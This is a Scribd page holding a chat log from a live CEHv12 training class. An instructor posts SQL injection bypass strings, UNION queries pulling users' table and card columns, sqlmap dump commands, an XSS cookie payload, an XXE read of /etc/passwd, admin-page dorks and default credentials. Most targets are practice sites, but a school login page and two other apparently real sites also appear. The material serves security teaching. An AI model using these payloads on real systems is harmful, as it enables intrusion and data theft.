Scribd Logo
Upload

Welcome to Scribd!

  • CEHv12 - Live - Online - Traini 2023 10 07 162020 Chat Messages

    Uploaded by

    Aveepsa Das
    8 views2 pages
    The document appears to be notes from an instructor sharing URLs, commands, and payloads related to vulnerability testing and exploitation with students. It includes URLs for vulnerable sites to test SQL injection and XXE, commands for installing sqlmap and dumping databases, default credentials to test, and payloads to test for vulnerabilities like stored and reflected XSS, SQLi, and XXE. The instructor is demonstrating how to scan for vulnerabilities and try exploitation.

    Original Description:

    Original Title

    CEHv12_Live_Online_Traini-2023-10-07-162020-chat-messages

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    The document appears to be notes from an instructor sharing URLs, commands, and payloads related to vulnerability testing and exploitation with students. It includes URLs for vulnerable sites to test SQL injection and XXE, commands for installing sqlmap and dumping databases, default credentials to test, and payloads to test for vulnerabilities like stored and reflected XSS, SQLi, and XXE. The instructor is demonstrating how to scan for vulnerabilities and try exploitation.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as txt, pdf, or txt
    8 views2 pages

    CEHv12 - Live - Online - Traini 2023 10 07 162020 Chat Messages

    Uploaded by

    Aveepsa Das
    The document appears to be notes from an instructor sharing URLs, commands, and payloads related to vulnerability testing and exploitation with students. It includes URLs for vulnerable sites to test SQL injection and XXE, commands for installing sqlmap and dumping databases, default credentials to test, and payloads to test for vulnerabilities like stored and reflected XSS, SQLi, and XXE. The instructor is demonstrating how to scan for vulnerabilities and try exploitation.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as txt, pdf, or txt
    of 2

    Instructor to Everyone 09:25 AM dirb http://testphp.vulnweb.

    com

    Instructor to Everyone 09:25 AM http://www.hrithikrules.com/


    Instructor to Everyone 09:25 AM https://vetritravels.com/
    Instructor to Everyone 09:34 AM https://demo.testfire.net/login.jsp
    Instructor to Everyone 09:34 AM 1'or'1=1
    Instructor to Everyone 09:39 AM inurl:adminlogin.php
    Instructor to Everyone 09:39 AM inurl:adminlogin.asp
    inurl:adminlogin.aspx
    Instructor to Everyone 09:42 AM https://github.com/payloadbox/sql-injection-
    payload-list
    Instructor to Everyone 09:43 AM admin/admin
    Instructor to Everyone 10:12 AM *
    Instructor to Everyone 10:12 AM '
    Instructor to Everyone 10:12 AM "
    Instructor to Everyone 10:16 AM https://www.freecodecamp.org/news/how-to-
    protect-against-sql-injection-attacks/
    Instructor to Everyone 10:25 AM --dump-all
    Instructor to Everyone 10:25 AM sqlmap -u https://testsite.com/page.php?id=1 -D
    <db_name> --tables
    Instructor to Everyone 10:25 AM sqlmap -u http://testsite.com/page.php?id=1 --
    dbs
    Instructor to Everyone 10:30 AM apt install sqlmap

    Instructor to Everyone 10:30 AM sudo apt install sqlmap

    Instructor to Everyone 10:35 AM https://demo.testfire.net/login.jsp


    Instructor to Everyone 10:43 AM ‘ or 1=1 – –
    Instructor to Everyone 11:31 AM ‘ or 1=1 – –
    Instructor to Everyone 11:35 AM admin’ --
    admin’ #
    admin’/*
    ‘ or 1=1 --
    ‘ or 1=1#
    ‘ or 1=1/*
    ‘) or ‘1’=’1 --
    ‘) or (‘1’=’1 --
    Instructor to Everyone 11:37 AM sql/sql i
    Instructor to Everyone 12:02 PM testphp.vulnweb.com/artists.php?artist=1'
    Instructor to Everyone 12:02 PM http://testphp.vulnweb.com/artists.php?artist=1
    union select 1,2,3
    Instructor to Everyone 12:02 PM http://testphp.vulnweb.com/artists.php?artist=-
    1 union select 1,database(),3
    Instructor to Everyone 12:11 PM testphp.vulnweb.com/artists.php?artist=1'
    http://testphp.vulnweb.com/artists.php?artist=1 union select 1,2,3
    http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,database(),3
    http://testphp.vulnweb.com/artists.php?artist=-1 union select
    1,version(),current_user()
    http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from
    information_schema.tables where table_schema=database() limit 0,1
    http://testphp.vulnweb.com/artists.php?artist=-1 union select
    1,group_concat(table_name),3 from information_schema.tables where
    table_schema=database()
    http://testphp.vulnweb.com/artists.php?artist=-1 union select
    1,group_concat(column_name),3 from information_schema.columns where
    table_name='users'
    http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(cc),3
    from users
    Instructor to Everyone 12:33 PM admin/admin
    Instructor to Everyone 12:33 PM test/test
    Instructor to Everyone 12:33 PM admin/password
    Instructor to Everyone 12:36 PM arrows
    Instructor to Everyone 12:37 PM
    https://www.lowellschools.com/Core/Guests/Logon?ReturnUrl=%2four-district
    %2fdepartments%2flibrary--media-services%2fhigh-school-textbooks%2f
    Instructor to Everyone 12:37 PM http://testphp.vulnweb.com test/test
    Instructor to Everyone 12:38 PM
    https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-
    Credentials
    Instructor to Everyone 12:47 PM https://portswigger.net/web-security/dashboard
    Instructor to Everyone 01:03 PM Unprotected admin functionality with
    unpredictable URL
    Instructor to Everyone 01:09 PM https://portswigger.net/burp/communitydownload
    Instructor to Everyone 01:12 PM https://portswigger.net/burp/communitydownload
    Instructor to Everyone 01:22 PM 127.0.0.1
    Instructor to Everyone 01:22 PM 8080
    Instructor to Everyone 01:24 PM http://burp
    Instructor to Everyone 01:26 PM
    https://portswigger.net/burp/documentation/desktop/external-browser-config/
    certificate/ca-cert-chrome-windows
    Instructor to Everyone 03:13 PM https://google-gruyere.appspot.com/
    Instructor to Everyone 03:15 PM <script>alert(document.cookie)</script>
    Instructor to Everyone 03:57 PM <!DOCTYPE xxe [ <!ENTITY xxe SYSTEM
    "file:///etc/passwd"> ]>
    &passwd;
    Instructor to Everyone 03:59 PM &xxe;
    Instructor to Everyone 04:05 PM <!DOCTYPE xxe [ <!ENTITY xxe SYSTEM
    "file:///etc/passwd"> ]>
    Instructor to Everyone 04:08 PM https://github.com/payloadbox/xxe-injection-
    payload-list
    Instructor to Everyone 04:11 PM xxe;
    Instructor to Everyone 04:14 PM <!DOCTYPE test [ <!ENTITY xxe SYSTEM
    "file:///etc/passwd"> ]>
    Instructor to Everyone 04:17 PM &xxe;

    You might also like